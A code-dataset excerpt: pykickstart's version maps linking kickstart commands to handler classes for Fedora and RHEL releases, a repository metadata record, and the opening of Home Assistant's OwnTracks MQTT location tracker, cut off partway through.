"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F12_Bootloader,
"cdrom": method.F13_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F12_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.F13_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F12_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.F13_Method,
"part": partition.F12_Partition,
"partition": partition.F12_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F13_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F13_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.F13_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F12_ZFCP,
},
# based on f13
F14: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F14_Bootloader,
"cdrom": method.F14_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F14_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F14_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.F14_Method,
"ignoredisk": ignoredisk.F14_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.F14_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F14_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.F14_Method,
"part": partition.F14_Partition,
"partition": partition.F14_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F14_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F14_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.F14_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F14_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F14_ZFCP,
},
# based on f14
F15: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F15_Bootloader,
"cdrom": method.F14_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F14_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F14_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.F14_Method,
"ignoredisk": ignoredisk.F14_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F15_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F9_Network,
"nfs": method.F14_Method,
"part": partition.F14_Partition,
"partition": partition.F14_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F15_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F15_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.F14_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F14_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F14_ZFCP,
},
# based on f15
F16: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.F15_Bootloader,
"cdrom": method.F14_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F14_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F14_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.F14_Method,
"ignoredisk": ignoredisk.F14_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F15_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.F16_Network,
"nfs": method.F14_Method,
"part": partition.F14_Partition,
"partition": partition.F14_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F15_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.F15_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.F14_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F14_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F14_ZFCP,
},
# based on fc1
RHEL3: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC3_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC3_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.FC3_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC3_LangSupport,
"lilo": bootloader.FC3_Bootloader,
"lilocheck": lilocheck.FC3_LiloCheck,
"logvol": logvol.FC3_LogVol,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.RHEL3_Mouse,
"network": network.FC3_Network,
"nfs": method.FC3_Method,
"part": partition.FC3_Partition,
"partition": partition.FC3_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC3_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
},
# based on fc3
RHEL4: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.FC3_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.FC3_Bootloader,
"cdrom": method.FC3_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"driverdisk": driverdisk.FC4_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC3_Reboot,
"harddrive": method.FC3_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC3_LangSupport,
"lilo": bootloader.FC3_Bootloader,
"lilocheck": lilocheck.FC3_LiloCheck,
"logvol": logvol.FC3_LogVol,
"monitor": monitor.FC3_Monitor,
"mouse": mouse.FC3_Mouse,
"network": network.RHEL4_Network,
"nfs": method.FC3_Method,
"part": partition.FC3_Partition,
"partition": partition.FC3_Partition,
"poweroff": reboot.FC3_Reboot,
"raid": raid.FC3_Raid,
"reboot": reboot.FC3_Reboot,
"rootpw": rootpw.FC3_RootPw,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC3_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC3_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"url": method.FC3_Method,
"vnc": vnc.FC3_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC3_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on fc6
RHEL5: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F9_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.RHEL5_Bootloader,
"cdrom": method.FC6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.FC3_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F12_DriverDisk,
"firewall": firewall.FC3_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"halt": reboot.FC6_Reboot,
"harddrive": method.FC6_Method,
"ignoredisk": ignoredisk.F8_IgnoreDisk,
"install": upgrade.FC3_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.FC6_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"key": key.RHEL5_Key,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"langsupport": langsupport.FC5_LangSupport,
"logging": logging.FC6_Logging,
"logvol": logvol.RHEL5_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.FC6_Monitor,
"mouse": mouse.FC3_Mouse,
"multipath": multipath.FC6_MultiPath,
"network": network.RHEL5_Network,
"nfs": method.FC6_Method,
"part": partition.RHEL5_Partition,
"partition": partition.RHEL5_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.RHEL5_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.FC6_Repo,
"rootpw": rootpw.FC3_RootPw,
"services": services.FC6_Services,
"selinux": selinux.FC3_SELinux,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"upgrade": upgrade.FC3_Upgrade,
"user": user.FC6_User,
"url": method.FC6_Method,
"vnc": vnc.FC6_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.FC6_XConfig,
"zerombr": zerombr.FC3_ZeroMbr,
"zfcp": zfcp.FC3_ZFCP,
},
# based on f13ish
RHEL6: {
"auth": authconfig.FC3_Authconfig,
"authconfig": authconfig.FC3_Authconfig,
"autopart": autopart.F12_AutoPart,
"autostep": autostep.FC3_AutoStep,
"bootloader": bootloader.RHEL6_Bootloader,
"cdrom": method.RHEL6_Method,
"clearpart": clearpart.FC3_ClearPart,
"cmdline": displaymode.FC3_DisplayMode,
"device": device.F8_Device,
"deviceprobe": deviceprobe.FC3_DeviceProbe,
"dmraid": dmraid.FC6_DmRaid,
"driverdisk": driverdisk.F12_DriverDisk,
"fcoe": fcoe.F13_Fcoe,
"firewall": firewall.F10_Firewall,
"firstboot": firstboot.FC3_Firstboot,
"graphical": displaymode.FC3_DisplayMode,
"group": group.F12_Group,
"halt": reboot.FC6_Reboot,
"harddrive": method.RHEL6_Method,
"ignoredisk": ignoredisk.RHEL6_IgnoreDisk,
"install": upgrade.F11_Upgrade,
"interactive": interactive.FC3_Interactive,
"iscsi": iscsi.F10_Iscsi,
"iscsiname": iscsiname.FC6_IscsiName,
"keyboard": keyboard.FC3_Keyboard,
"lang": lang.FC3_Lang,
"logging": logging.FC6_Logging,
"logvol": logvol.F12_LogVol,
"mediacheck": mediacheck.FC4_MediaCheck,
"monitor": monitor.F10_Monitor,
"multipath": multipath.FC6_MultiPath,
"network": network.RHEL6_Network,
"nfs": method.RHEL6_Method,
"part": partition.F12_Partition,
"partition": partition.F12_Partition,
"poweroff": reboot.FC6_Reboot,
"raid": raid.F13_Raid,
"reboot": reboot.FC6_Reboot,
"repo": repo.RHEL6_Repo,
"rescue": rescue.F10_Rescue,
"rootpw": rootpw.F8_RootPw,
"selinux": selinux.FC3_SELinux,
"services": services.FC6_Services,
"shutdown": reboot.FC6_Reboot,
"skipx": skipx.FC3_SkipX,
"sshpw": sshpw.F13_SshPw,
"text": displaymode.FC3_DisplayMode,
"timezone": timezone.FC6_Timezone,
"updates": updates.F7_Updates,
"upgrade": upgrade.F11_Upgrade,
"url": method.RHEL6_Method,
"user": user.F12_User,
"vnc": vnc.F9_Vnc,
"volgroup": volgroup.FC3_VolGroup,
"xconfig": xconfig.F10_XConfig,
"zerombr": zerombr.F9_ZeroMbr,
"zfcp": zfcp.F12_ZFCP,
}
}
# This map is keyed on kickstart syntax version as provided by
# pykickstart.version. Within each sub-dict is a mapping from a data object
# name to the class that provides it. This is a bijective mapping - that is,
# each name maps to exactly one data class and all data classes have a name.
# More than one instance of each class is allowed to exist, however.
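# For example, in the FC3 map below "PartData" is the only name mapped to
# partition.FC3_PartData, though a parsed kickstart file may hold many
# FC3_PartData instances (one per "part"/"partition" line).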
dataMap = {
FC3: {
"DriverDiskData": driverdisk.FC3_DriverDiskData,
"LogVolData": logvol.FC3_LogVolData,
"NetworkData": network.FC3_NetworkData,
"PartData": partition.FC3_PartData,
"RaidData": raid.FC3_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
FC4: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"LogVolData": logvol.FC4_LogVolData,
"NetworkData": network.FC4_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.FC4_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
FC5: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"LogVolData": logvol.FC4_LogVolData,
"NetworkData": network.FC4_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.FC5_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
FC6: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.FC4_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.FC6_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.FC5_RaidData,
"RepoData": repo.FC6_RepoData,
"UserData": user.FC6_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F7: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.FC4_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.FC6_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.F7_RaidData,
"RepoData": repo.FC6_RepoData,
"UserData": user.FC6_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F8: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.FC4_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.FC4_PartData,
"RaidData": raid.F7_RaidData,
"RepoData": repo.F8_RepoData,
"UserData": user.F8_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F9: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.F9_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F9_PartData,
"RaidData": raid.F9_RaidData,
"RepoData": repo.F8_RepoData,
"UserData": user.F8_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F10: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F9_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F9_PartData,
"RaidData": raid.F9_RaidData,
"RepoData": repo.F8_RepoData,
"UserData": user.F8_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F11: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F9_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F11_PartData,
"RaidData": raid.F9_RaidData,
"RepoData": repo.F11_RepoData,
"UserData": user.F8_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
F12: {
"DriverDiskData": driverdisk.F12_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F12_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F12_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F12_PartData,
"RaidData": raid.F12_RaidData,
"RepoData": repo.F11_RepoData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F12_ZFCPData,
},
F13: {
"DriverDiskData": driverdisk.F12_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F12_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F12_PartData,
"RaidData": raid.F13_RaidData,
"RepoData": repo.F13_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F12_ZFCPData,
},
F14: {
"DriverDiskData": driverdisk.F14_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F14_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F14_PartData,
"RaidData": raid.F14_RaidData,
"RepoData": repo.F14_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F14_ZFCPData,
},
F15: {
"DriverDiskData": driverdisk.F14_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F15_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F8_NetworkData,
"PartData": partition.F14_PartData,
"RaidData": raid.F15_RaidData,
"RepoData": repo.F15_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F14_ZFCPData,
},
F16: {
"DriverDiskData": driverdisk.F14_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F15_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.F16_NetworkData,
"PartData": partition.F14_PartData,
"RaidData": raid.F15_RaidData,
"RepoData": repo.F15_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F14_ZFCPData,
},
RHEL3: {
"DriverDiskData": driverdisk.FC3_DriverDiskData,
"LogVolData": logvol.FC3_LogVolData,
"NetworkData": network.RHEL4_NetworkData,
"PartData": partition.FC3_PartData,
"RaidData": raid.FC3_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
RHEL4: {
"DriverDiskData": driverdisk.FC4_DriverDiskData,
"LogVolData": logvol.FC3_LogVolData,
"NetworkData": network.RHEL4_NetworkData,
"PartData": partition.FC3_PartData,
"RaidData": raid.FC3_RaidData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
RHEL5: {
"DriverDiskData": driverdisk.F12_DriverDiskData,
"DmRaidData": dmraid.FC6_DmRaidData,
"IscsiData": iscsi.FC6_IscsiData,
"LogVolData": logvol.RHEL5_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.FC6_NetworkData,
"PartData": partition.RHEL5_PartData,
"RaidData": raid.RHEL5_RaidData,
"RepoData": repo.FC6_RepoData,
"UserData": user.FC6_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.FC3_ZFCPData,
},
RHEL6: {
"DriverDiskData": driverdisk.F12_DriverDiskData,
"DeviceData": device.F8_DeviceData,
"DmRaidData": dmraid.FC6_DmRaidData,
"FcoeData": fcoe.F13_FcoeData,
"GroupData": group.F12_GroupData,
"IscsiData": iscsi.F10_IscsiData,
"LogVolData": logvol.F12_LogVolData,
"MultiPathData": multipath.FC6_MultiPathData,
"NetworkData": network.RHEL6_NetworkData,
"PartData": partition.F12_PartData,
"RaidData": raid.F13_RaidData,
"RepoData": repo.RHEL6_RepoData,
"SshPwData": sshpw.F13_SshPwData,
"UserData": user.F12_UserData,
"VolGroupData": volgroup.FC3_VolGroupData,
"ZFCPData": zfcp.F12_ZFCPData,
}
}
|
{
"content_hash": "6db1256484f2488353aff4425156980b",
"timestamp": "",
"source": "github",
"line_count": 1288,
"max_line_length": 77,
"avg_line_length": 38.838509316770185,
"alnum_prop": 0.6096873500719655,
"repo_name": "marcosbontempo/inatelos",
"id": "d8c8f2b89941c7c8de37393b7127e483f6a341b0",
"size": "50993",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "poky-daisy/scripts/lib/mic/3rdparty/pykickstart/handlers/control.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "158"
},
{
"name": "BitBake",
"bytes": "1910696"
},
{
"name": "BlitzBasic",
"bytes": "4400"
},
{
"name": "C",
"bytes": "1751572"
},
{
"name": "C++",
"bytes": "354295"
},
{
"name": "CMake",
"bytes": "6537"
},
{
"name": "CSS",
"bytes": "27029"
},
{
"name": "Groff",
"bytes": "502444"
},
{
"name": "HTML",
"bytes": "141762"
},
{
"name": "JavaScript",
"bytes": "22555"
},
{
"name": "Lua",
"bytes": "1194"
},
{
"name": "Makefile",
"bytes": "32254"
},
{
"name": "Nginx",
"bytes": "2744"
},
{
"name": "Perl",
"bytes": "66300"
},
{
"name": "Perl6",
"bytes": "73"
},
{
"name": "Python",
"bytes": "3529760"
},
{
"name": "Shell",
"bytes": "598521"
},
{
"name": "Tcl",
"bytes": "60106"
},
{
"name": "VimL",
"bytes": "8506"
},
{
"name": "XSLT",
"bytes": "8814"
}
],
"symlink_target": ""
}
|
"""
homeassistant.components.device_tracker.owntracks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OwnTracks platform for the device tracker.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/device_tracker.owntracks/
"""
import json
import logging
import homeassistant.components.mqtt as mqtt
from homeassistant.const import (STATE_HOME, STATE_NOT_HOME)
DEPENDENCIES = ['mqtt']
CONF_TRANSITION_EVENTS = 'use_events'
LOCATION_TOPIC = 'owntracks/+/+'
EVENT_TOPIC = 'owntracks/+/+/event'
def setup_scanner(hass, config, see):
""" Set up an OwnTracks tracker. """
def owntracks_location_update(topic, payload, qos):
""" MQTT message received. """
# Docs on available data:
# http://owntracks.org/booklet/tech/json/#_typelocation
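        # A minimal example payload, inferred from the keys handled below:
        #   {"_type": "location", "lat": 52.1, "lon": 5.2, "acc": 10, "batt": 92}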
try:
data = json.loads(payload)
except ValueError:
# If invalid JSON
logging.getLogger(__name__).error(
'Unable to parse payload as JSON: %s', payload)
return
if not isinstance(data, dict) or data.get('_type') != 'location':
return
parts = topic.split('/')
kwargs = {
'dev_id': '{}_{}'.format(parts[1], parts[2]),
'host_name': parts[1],
'gps': (data['lat'], data['lon']),
}
if 'acc' in data:
kwargs['gps_accuracy'] = data['acc']
if 'batt' in data:
kwargs['battery'] = data['batt']
see(**kwargs)
def owntracks_event_update(topic, payload, qos):
""" MQTT event (geofences) received. """
# Docs on available data:
# http://owntracks.org/booklet/tech/json/#_typetransition
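        # A minimal example payload, inferred from the keys handled below:
        #   {"_type": "transition", "event": "enter", "desc": "home",
        #    "lat": 52.1, "lon": 5.2, "acc": 10}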
try:
data = json.loads(payload)
except ValueError:
# If invalid JSON
logging.getLogger(__name__).error(
